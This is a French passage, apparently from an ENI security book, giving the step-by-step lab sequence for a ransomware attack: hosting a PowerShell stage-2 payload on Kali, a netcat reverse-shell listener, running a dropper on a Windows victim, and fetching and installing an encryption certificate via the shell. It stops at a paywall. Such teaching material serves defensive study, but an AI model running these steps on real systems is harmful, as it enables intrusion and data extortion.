L’attaque, pas à pas

Le développement est terminé, cela peut paraître compliqué mais en vérité l’attaque en situation réelle tient dans la séquence ci-dessous.

Préparation sur le serveur de l’attaquant :

 Sur la machine Kali, lancez un serveur web de contenu sur la machine de l’attaquant :

$ python3 -m http.server

  • Mettez à disposition le stage 2 PowerShell sur le serveur web avec le fichier ematete.ps1 dans une archive ZIP Ematete.zip (en plaçant le fichier directement dans le répertoire proposé par le serveur HTTP).

  • Mettez à disposition sur le serveur web le fichier du certificat contenant la clé publique RSA.

 Continuez sur Kali et lancez un listener en attente de reverse shell sur le port 4443 :

$ nc -lvp 4443

Sur le poste Windows 10, exécutez le fichier dropper.ps1 sur la machine de la victime. Cette commande établit une connexion sur le reverse shell et permet de lancer la phase de rançongiciel depuis la machine Kali :

.\dropper.ps1

 Depuis le reverse shell sur Kali, faites télécharger sur la machine le certificat pour le chiffrement :

Invoke-WebRequest -Uri http://10.0.2.5:8000/cert.pem -OutFile  
cert.pem

 Puis injectez-le dans le magasin de l’utilisateur :

certutil -addstore -user -f "My" .\cert.pem

 Depuis le reverse shell, exécutez le script Prepare-Key.ps1, soit en copiant-collant ligne par ligne à la main...

Pour consulter la suite, découvrez le livre suivant :
couv_EPCYBPOW.png
60-signet.svg
En version papier
20-ecran_lettre.svg
En version numérique
41-logo_abonnement.svg
En illimité avec l'abonnement ENI
130-boutique.svg
Sur la boutique officielle ENI
Précédent
Étape 4 : le ransomware
Suivant
Conclusion
logo_ENI_global.svgConditions générales d'utilisationCopyright - © Editions ENI ||Politique de protection des données du groupe ENI